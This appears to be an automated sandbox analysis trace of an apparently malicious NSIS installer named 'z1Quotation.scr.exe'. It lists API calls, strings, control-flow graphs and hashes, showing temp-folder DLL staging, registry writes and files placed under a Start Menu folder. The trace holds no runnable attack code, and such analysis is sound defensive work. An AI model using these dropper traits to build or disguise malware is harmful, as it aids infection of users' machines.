                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                  • String ID: "C:\Users\user\Desktop\z1Quotation.scr.exe"$\*.*
                                                                                                                  • API String ID: 2035342205-2925939100

                                                                                                                  Control-flow Graph (starting block 406aba-406abf)
                                                                                                                  APIs
                                                                                                                  • FindFirstFileA.KERNELBASE(76273410,004221A0,00421D58,00405E61,00421D58,00421D58,00000000,00421D58,00421D58,76273410,?,76272EE0,00405B80,?,76273410,76272EE0), ref: 0040673C
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00406748
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2295610775-0

                                                                                                                  Control-flow Graph (starting block 403ba7-403bbf)
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004067C6: GetModuleHandleA.KERNEL32(?,00000000,?,00403613,0000000C), ref: 004067D8
                                                                                                                    • Part of subcall function 004067C6: GetProcAddress.KERNEL32(00000000,?), ref: 004067F3
                                                                                                                  • lstrcatA.KERNEL32(1033,Inaugurates Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Inaugurates Setup: Installing,00000000,00000002,76273410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\z1Quotation.scr.exe",0000000A,0000000C), ref: 00403C22
                                                                                                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55,1033,Inaugurates Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Inaugurates Setup: Installing,00000000,00000002,76273410), ref: 00403C97
                                                                                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 00403CAA
                                                                                                                  • GetFileAttributesA.KERNEL32(Call,?,"C:\Users\user\Desktop\z1Quotation.scr.exe",0000000A,0000000C), ref: 00403CB5
                                                                                                                  • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55), ref: 00403CFE
                                                                                                                    • Part of subcall function 004062FC: wsprintfA.USER32 ref: 00406309
                                                                                                                  • RegisterClassA.USER32(00423AE0), ref: 00403D3B
                                                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403D53
                                                                                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403D88
                                                                                                                  • ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\z1Quotation.scr.exe",0000000A,0000000C), ref: 00403DBE
                                                                                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,00423AE0), ref: 00403DEA
                                                                                                                  • GetClassInfoA.USER32(00000000,RichEdit,00423AE0), ref: 00403DF7
                                                                                                                  • RegisterClassA.USER32(00423AE0), ref: 00403E00
                                                                                                                  • DialogBoxParamA.USER32(?,00000000,00403F44,00000000), ref: 00403E1F
                                                                                                                  Similarity
                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                  • String ID: "C:\Users\user\Desktop\z1Quotation.scr.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55$Call$Control Panel\Desktop\ResourceLocale$Inaugurates Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$:B

                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 00402F75
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\z1Quotation.scr.exe,00000400), ref: 00402F91
                                                                                                                    • Part of subcall function 00405F31: GetFileAttributesA.KERNELBASE(00000003,00402FA4,C:\Users\user\Desktop\z1Quotation.scr.exe,80000000,00000003), ref: 00405F35
                                                                                                                    • Part of subcall function 00405F31: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F57
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z1Quotation.scr.exe,C:\Users\user\Desktop\z1Quotation.scr.exe,80000000,00000003), ref: 00402FDA
                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,0000000A), ref: 0040311C
                                                                                                                  Strings
                                                                                                                  • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error, xrefs: 004031B3
                                                                                                                  • Error launching installer, xrefs: 00402FB1
                                                                                                                  • Null, xrefs: 00403058
                                                                                                                  • C:\Users\user\Desktop\z1Quotation.scr.exe, xrefs: 00402F7B, 00402F8A, 00402F9E, 00402FBB
                                                                                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403165
                                                                                                                  • soft, xrefs: 0040304F
                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402F6B, 00403134
                                                                                                                  • Inst, xrefs: 00403046
                                                                                                                  • "C:\Users\user\Desktop\z1Quotation.scr.exe", xrefs: 00402F6A
                                                                                                                  • C:\Users\user\Desktop, xrefs: 00402FBC, 00402FC1, 00402FC7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                  • String ID: "C:\Users\user\Desktop\z1Quotation.scr.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\z1Quotation.scr.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error$Null$soft

                                                                                                                  APIs
                                                                                                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406563
                                                                                                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,0040551A,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000), ref: 00406579
                                                                                                                  • SHGetPathFromIDListA.SHELL32(00000000,Call,?,0040551A,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,0040551A,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000), ref: 004065D8
                                                                                                                  • CoTaskMemFree.OLE32(00000000,?,0040551A,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,0040551A,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000), ref: 004065E1
                                                                                                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,0040551A,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000), ref: 00406605
                                                                                                                  • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,0040551A,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,00000000), ref: 00406657
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch

                                                                                                                  APIs
                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines,00000000,00000000,00000031), ref: 0040179D
                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines,00000000,00000000,00000031), ref: 004017C7
                                                                                                                    • Part of subcall function 0040639E: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,00403674,Inaugurates Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 004063AB
                                                                                                                    • Part of subcall function 004054E2: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000,?), ref: 0040551B
                                                                                                                    • Part of subcall function 004054E2: lstrlenA.KERNEL32(9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000), ref: 0040552B
                                                                                                                    • Part of subcall function 004054E2: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,0040A130,9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000), ref: 0040553E
                                                                                                                    • Part of subcall function 004054E2: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll), ref: 00405550
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405576
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405590
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040559E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsi8284.tmp$C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines$Call

                                                                                                                  APIs
                                                                                                                  • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000,?), ref: 0040551B
                                                                                                                  • lstrlenA.KERNEL32(9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000), ref: 0040552B
                                                                                                                  • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,0040A130,9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000), ref: 0040553E
                                                                                                                  • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll), ref: 00405550
                                                                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405576
                                                                                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405590
                                                                                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040559E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                  • String ID: 9/@$Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll
                                                                                                                  • API String ID: 2531174081-3549388143

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 672 406758-406778 GetSystemDirectoryA 673 40677a 672->673 674 40677c-40677e 672->674 673->674 675 406780-406788 674->675 676 40678e-406790 674->676 675->676 677 40678a-40678c 675->677 678 406791-4067c3 wsprintfA LoadLibraryExA 676->678 677->678
                                                                                                                  APIs
                                                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040676F
                                                                                                                  • wsprintfA.USER32 ref: 004067A8
                                                                                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004067BC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                  • String ID: %s%s.dll$UXTHEME$\
                                                                                                                  • API String ID: 2200240437-4240819195

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 679 6d43176b-6d4317a7 call 6d431b28 683 6d4318c4-6d4318c6 679->683 684 6d4317ad-6d4317b1 679->684 685 6d4317b3-6d4317b9 call 6d43233f 684->685 686 6d4317ba-6d4317c7 call 6d432381 684->686 685->686 691 6d4317f7-6d4317fe 686->691 692 6d4317c9-6d4317ce 686->692 693 6d431800-6d43181c call 6d432568 call 6d4315e9 call 6d4312f6 GlobalFree 691->693 694 6d43181e-6d431822 691->694 695 6d4317d0-6d4317d1 692->695 696 6d4317e9-6d4317ec 692->696 719 6d431873-6d431877 693->719 697 6d431824-6d43186a call 6d4315fb call 6d432568 694->697 698 6d43186c-6d431872 call 6d432568 694->698 701 6d4317d3-6d4317d4 695->701 702 6d4317d9-6d4317da call 6d432ac8 695->702 696->691 699 6d4317ee-6d4317ef call 6d432d53 696->699 697->719 698->719 713 6d4317f4 699->713 708 6d4317e1-6d4317e7 call 6d432742 701->708 709 6d4317d6-6d4317d7 701->709 710 6d4317df 702->710 718 6d4317f6 708->718 709->691 709->702 710->713 713->718 718->691 723 6d4318b4-6d4318bb 719->723 724 6d431879-6d431887 call 6d43252e 719->724 723->683 726 6d4318bd-6d4318be GlobalFree 723->726 729 6d431889-6d43188c 724->729 730 6d43189f-6d4318a6 724->730 726->683 729->730 731 6d43188e-6d431896 729->731 730->723 732 6d4318a8-6d4318b3 call 6d431572 730->732 731->730 733 6d431898-6d431899 FreeLibrary 731->733 732->723 733->730
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6D431B28: GlobalFree.KERNEL32(?), ref: 6D431D99
                                                                                                                    • Part of subcall function 6D431B28: GlobalFree.KERNEL32(?), ref: 6D431D9E
                                                                                                                    • Part of subcall function 6D431B28: GlobalFree.KERNEL32(?), ref: 6D431DA3
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6D431816
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 6D431899
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6D4318BE
                                                                                                                    • Part of subcall function 6D43233F: GlobalAlloc.KERNEL32(00000040,?), ref: 6D432370
                                                                                                                    • Part of subcall function 6D432742: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6D4317E7,00000000), ref: 6D432812
                                                                                                                    • Part of subcall function 6D4315FB: wsprintfA.USER32 ref: 6D431629
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33522427581.000000006D431000.00000020.00000001.01000000.00000004.sdmp, Offset: 6D430000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6d430000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3962662361-3916222277

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 736 402483-4024b4 call 402c3e * 2 call 402cce 743 402aca-402ad9 736->743 744 4024ba-4024c4 736->744 746 4024d4-4024d7 744->746 747 4024c6-4024d3 call 402c3e lstrlenA 744->747 748 4024d9-4024ed call 402c1c 746->748 749 4024ee-4024f1 746->749 747->746 748->749 753 402502-402516 RegSetValueExA 749->753 754 4024f3-4024fd call 403202 749->754 758 402518 753->758 759 40251b-4025f8 RegCloseKey 753->759 754->753 758->759 759->743
                                                                                                                  APIs
                                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi8284.tmp,00000023,00000011,00000002), ref: 004024CE
                                                                                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsi8284.tmp,00000000,00000011,00000002), ref: 0040250E
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi8284.tmp,00000000,00000011,00000002), ref: 004025F2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseValuelstrlen
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsi8284.tmp
                                                                                                                  • API String ID: 2655323295-1599890453

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 761 405f60-405f6a 762 405f6b-405f96 GetTickCount GetTempFileNameA 761->762 763 405fa5-405fa7 762->763 764 405f98-405f9a 762->764 766 405f9f-405fa2 763->766 764->762 765 405f9c 764->765 765->766
                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 00405F74
                                                                                                                  • GetTempFileNameA.KERNELBASE(0000000C,?,00000000,?,?,004034CF,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008), ref: 00405F8E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                  • API String ID: 1716503409-944333549

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 767 4020aa-4020b6 768 402171-402173 767->768 769 4020bc-4020d2 call 402c3e * 2 767->769 770 4022ea-4022ef call 401423 768->770 779 4020e1-4020ef LoadLibraryExA 769->779 780 4020d4-4020df GetModuleHandleA 769->780 776 402aca-402ad9 770->776 782 4020f1-4020fe GetProcAddress 779->782 783 40216a-40216c 779->783 780->779 780->782 784 402100-402106 782->784 785 40213d-402142 call 4054e2 782->785 783->770 786 402108-402114 call 401423 784->786 787 40211f-402136 call 6d43176b 784->787 790 402147-40214a 785->790 786->790 797 402116-40211d 786->797 792 402138-40213b 787->792 790->776 793 402150-402158 call 403b47 790->793 792->790 793->776 798 40215e-402165 FreeLibrary 793->798 797->790 798->776
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 004020D5
                                                                                                                    • Part of subcall function 004054E2: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000,?), ref: 0040551B
                                                                                                                    • Part of subcall function 004054E2: lstrlenA.KERNEL32(9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000), ref: 0040552B
                                                                                                                    • Part of subcall function 004054E2: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,0040A130,9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000), ref: 0040553E
                                                                                                                    • Part of subcall function 004054E2: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll), ref: 00405550
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405576
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405590
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040559E
                                                                                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 004020E5
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004020F5
                                                                                                                  • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 0040215F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2987980305-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00405DC9: CharNextA.USER32(?,?,00421D58,0000000C,00405E35,00421D58,00421D58,76273410,?,76272EE0,00405B80,?,76273410,76272EE0,"C:\Users\user\Desktop\z1Quotation.scr.exe"), ref: 00405DD7
                                                                                                                    • Part of subcall function 00405DC9: CharNextA.USER32(00000000), ref: 00405DDC
                                                                                                                    • Part of subcall function 00405DC9: CharNextA.USER32(00000000), ref: 00405DF0
                                                                                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                                    • Part of subcall function 004059A8: CreateDirectoryA.KERNELBASE(?,?), ref: 004059EA
                                                                                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines,00000000,00000000,000000F0), ref: 00401641
                                                                                                                  Strings
                                                                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines, xrefs: 00401636
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines
                                                                                                                  • API String ID: 1892508949-4275992298
                                                                                                                  APIs
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000000,?,?,00406543,80000002), ref: 004062CB
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00406543,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll), ref: 004062D6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseQueryValue
                                                                                                                  • String ID: Call
                                                                                                                  • API String ID: 3356406503-1824292864
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 0040331E
                                                                                                                    • Part of subcall function 00403489: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403187,?), ref: 00403497
                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403234,00000004,00000000,00000000,0000000C,?,004031AE,000000FF,00000000,00000000,0000000A,?), ref: 00403351
                                                                                                                  • SetFilePointer.KERNELBASE(00006C5D,00000000,00000000,004138F8,00004000,?,00000000,00403234,00000004,00000000,00000000,0000000C,?,004031AE,000000FF,00000000), ref: 0040344C
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePointer$CountTick
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1092082344-0
                                                                                                                  • Opcode ID: 798ae4cb807969a8f9b20dbfb01d8f4788347d3a684976bc915bde066e73c198
                                                                                                                  • Instruction ID: 5e2760829c16be5b456b2d80c3179de7c6ad0aba997fd416184bbac8d4f32be0
                                                                                                                  • Opcode Fuzzy Hash: 798ae4cb807969a8f9b20dbfb01d8f4788347d3a684976bc915bde066e73c198
                                                                                                                  • Instruction Fuzzy Hash: 9C319E72A00205DBD710BF2AFE849663BACE741356324C13BE914B62F1CB385945CFAD
                                                                                                                  APIs
                                                                                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025C7
                                                                                                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025DA
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi8284.tmp,00000000,00000011,00000002), ref: 004025F2
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Enum$CloseValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 397863658-0
                                                                                                                  • Opcode ID: 417f50e0dc36b601b755ede1854ca579d660d2e7217a5d95a27266ee8b79debb
                                                                                                                  • Instruction ID: 7af551deeb249fce77ef5554b7c2dda59263b98fb5fba8a2876bb3d2f6d05d2c
                                                                                                                  • Opcode Fuzzy Hash: 417f50e0dc36b601b755ede1854ca579d660d2e7217a5d95a27266ee8b79debb
                                                                                                                  • Instruction Fuzzy Hash: 00017571604104AFE7159F54DE98ABF7A68EF81359F20443EF501A61C0D6B44A419639
                                                                                                                  APIs
                                                                                                                  • SetFilePointer.KERNELBASE(0000000A,00000000,00000000,00000000,00000000,0000000C,?,004031AE,000000FF,00000000,00000000,0000000A,?), ref: 00403227
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 973152223-0
                                                                                                                  • Opcode ID: 30e242b14a2b822041ab8f12606bbed43d081868df01e651b14b32d607499233
                                                                                                                  • Instruction ID: bc7567603561231bc2ec1d28084f63335ade027d3a01cf31267e3f63722e5d9c
                                                                                                                  • Opcode Fuzzy Hash: 30e242b14a2b822041ab8f12606bbed43d081868df01e651b14b32d607499233
                                                                                                                  • Instruction Fuzzy Hash: 2931AB7020021AFFDB109F96ED85A9A3FA8EB00355B20847AF914E61D0D738DB51DBA9
                                                                                                                  APIs
                                                                                                                  • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402553
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi8284.tmp,00000000,00000011,00000002), ref: 004025F2
